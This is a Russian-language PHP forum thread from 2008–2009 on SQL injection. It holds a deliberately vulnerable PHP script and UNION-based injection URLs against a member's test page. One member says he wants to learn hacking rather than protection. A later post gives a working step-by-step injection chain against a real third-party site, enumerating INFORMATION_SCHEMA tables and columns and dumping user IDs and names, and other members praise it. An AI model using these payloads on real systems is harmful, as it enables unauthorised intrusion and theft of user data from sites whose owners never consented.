ФорумПрограммированиеПыхнуть хотите?F.A.Q. → Безопасность.Часть 1.SQL-иньекции

Безопасность.Часть 1.SQL-иньекции

  • sap

    Сообщения: ? Репутация: N Группа: Кто попало

    Spritz 21 июля 2008 г. 10:22, спустя 2 минуты 41 секунду

    Значит не шаришь :) Дай-ка ссылку на свой скрипт.
    + еще у тебя наверняка включен магик_квотес
  • Frozzeg

    Сообщения: 5642 Репутация: N Группа: Джедаи

    Spritz 21 июля 2008 г. 10:39, спустя 17 минут 7 секунд

    http://ssun.no-ip.org/some_sql_injection.php?id=1

    выключен
    You can be anything you want to be. Just turn yourself into anything you think that you could ever be.
  • adw0rd

    Сообщения: 22902 Репутация: N Группа: в ухо

    Spritz 21 июля 2008 г. 11:15, спустя 36 минут 27 секунд

    да и вообще ничего из данной статьи не прошло


    Frozzeg, http://ssun.no-ip.org/some_sql_injection.php?id=1'+union+select+null,null,null/*

    Теперь осталось перебрать имена таблиц (заместо null), выводились бы пользовательские данные, мне бы на ум пришло в первую очередь "passwd", "pass", "password", "pwd", "p"
    adw/0
  • adw0rd

    Сообщения: 22902 Репутация: N Группа: в ухо

    Spritz 21 июля 2008 г. 11:24, спустя 8 минут 19 секунд

    Наверняка у тебя там стоит свитч-кейс конструкция, так как при таком запросе "http://ssun.no-ip.org/some_sql_injection.php?id=1'+and+id+is+null/*"; получаем "Гость!!! Лох ли ты? Xз", и это значение выдается по дефолту, так как мускуль не отдал ничего.

    Да, ну еще установил что у тебя есть поле "id"…
    adw/0
  • adw0rd

    Сообщения: 22902 Репутация: N Группа: в ухо

    Spritz 21 июля 2008 г. 11:32, спустя 8 минут 50 секунд

    Frozzeg, только не включай мегик_квот, лучше заюзай mysql_real_escape_string или еще лучше goDB — библиотека для работы с MySQL из PHP
    adw/0
  • Frozzeg

    Сообщения: 5642 Репутация: N Группа: Джедаи

    Spritz 22 июля 2008 г. 0:14, спустя 12 часов 41 минуту 15 секунд

    я и не собирался, что до mysql_real_escape_string, то спасибо конечно, но с защитой я ознакомлен) меня интересует взлом

    да и вообще ничего из данной статьи не прошло


    Frozzeg, http://ssun.no-ip.org/some_sql_injection.php?id=1'+union+select+null,null,null/*

    Теперь осталось перебрать имена таблиц (заместо null), выводились бы пользовательские данные, мне бы на ум пришло в первую очередь "passwd", "pass", "password", "pwd", "p"

    вставил имена таблиц но появилась только ошибка


    Да, ну еще установил что у тебя есть поле "id"…


    как?)


    а вот сам скрипт если интересно
    <?php
    if(isset($_GET[id]))
    {
    $id=$_GET[id];
    if(!empty($id))
    {
    @include_once &#39;mysql.inc.php&#39;;
    mysql_select_db(&quot;sql_inj&quot;);
    $query=mysql_query(&quot;select * from users where id=&#39;$id&#39;&quot;);
    if($query)
    {
    $values=mysql_fetch_array($query);
            if(empty($values[username]) and empty($values[lox]))
                    {
                               $values[username]=&quot;Гость&quot;;
                               $values[lox]=&quot;Xз&quot;;
                    }
    echo $values[username].&quot;!!! Лох ли ты? &quot;.$values[lox];
    }
    }
    }
    ?>
    You can be anything you want to be. Just turn yourself into anything you think that you could ever be.
  • adw0rd

    Сообщения: 22902 Репутация: N Группа: в ухо

    Spritz 22 июля 2008 г. 1:11, спустя 57 минут 43 секунды

    вставил имена таблиц но появилась только ошибка

    Frozzeg, ты не понимаешь как работает UNION. Выводи полностью весь результат полученный от
    $values=mysql_fetch_array($query);

    то есть сделай var_dump($values) или forearch&#39;ем выводи.

    как?)

    Логикой и методом научного тыка.
    adw/0
  • Mr.Pihto

    Сообщения: ? Репутация: N Группа: Адекваты

    Spritz 2 августа 2009 г. 13:26, спустя 376 дней 12 часов 14 минут

    кому мож интересно..

    применение уязвимости к зарубежному сайту sonix.dk

    тут узнаем все таблицы данной биде)

    http://sonix.dk/index.php?page=forum&amp;id=-2&#39;+union+select+1,2,3,4,5,table_NAME,7,8+from+INFORMATION_SCHEMA.tables+--+


    тут узнаём все столбцы таблицы указанной после where+table_name=&#39;

    http://sonix.dk/index.php?page=forum&amp;id=-2&#39;+union+select+1,2,3,4,5,COLUMN_NAME,7,8+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=&#39;openid_user&#39;+--+


    ну а тут собсно вместо вылезжих настранице цифр(подобраных нами полей) подставляем необходимые колонки

    http://sonix.dk/index.php?page=forum&amp;id=-1&#39;+union+select+1,2,3,4,5,id,name,8+from+openid_user+--+


    зы если надо стразу 2 столбца вместо 1й цифры пишем так:

    http://sonix.dk/index.php?page=forum&amp;id=-1&#39;+union+select+1,2,3,4,5,concat_ws(0x3a,id,name),7,8+from+openid_user+--+

    щас цифра 7 свободна а внизу вместо 6ки  идёт ид:нейм
  • phpdude

    Сообщения: 26614 Репутация: N Группа: в ухо

    Spritz 2 августа 2009 г. 13:25, спустя 23 часа 58 минут 34 секунды

    Mr.Pihto, молорик :) {+++15+++} добавил в фавориты :)
    Сапожник без сапог
  • Mr.Pihto

    Сообщения: ? Репутация: N Группа: Адекваты

    Spritz 2 августа 2009 г. 13:27, спустя 2 минуты 25 секунд

    phpdude, рад что понравилось) {+++32+++} мне и самому понравилось)
  • Mr.Pihto

    Сообщения: ? Репутация: N Группа: Адекваты

    Spritz 3 августа 2009 г. 7:08, спустя 17 часов 40 минут 33 секунды

    phpdude, но везде свои приколы.. такчто если неполучица данным способом то это незначит что там ниче не сдеалть.. сюда кинеш поковыряем)
  • pasha

    Сообщения: 1047 Репутация: N Группа: Адекваты

    Spritz 7 августа 2009 г. 12:37, спустя 4 дня 5 часов 29 минут

    cage же вроде возродился?)
  • Sinkler

    Сообщения: 9655 Репутация: N Группа: в ухо

    Spritz 7 августа 2009 г. 12:52, спустя 14 минут 48 секунд

    о_О когда и в чьем обличии??? Я опять что-то пропустил???
  • adw0rd

    Сообщения: 22902 Репутация: N Группа: в ухо

    Spritz 7 августа 2009 г. 12:53, спустя 1 минуту 41 секунду


    о_О когда и в чьем обличии??? Я опять что-то пропустил???
    да, он был тут месяц-два назад… в разделе Java посмотри
    adw/0
  • Frozzeg

    Сообщения: 5642 Репутация: N Группа: Джедаи

    Spritz 7 августа 2009 г. 12:55, спустя 1 минуту 7 секунд



    о_О когда и в чьем обличии??? Я опять что-то пропустил???
    да, он был тут месяц-два назад… в разделе Java посмотри
    йомана, этож атец флуда на пыхе…
    You can be anything you want to be. Just turn yourself into anything you think that you could ever be.

Пожалуйста, авторизуйтесь, чтобы написать комментарий!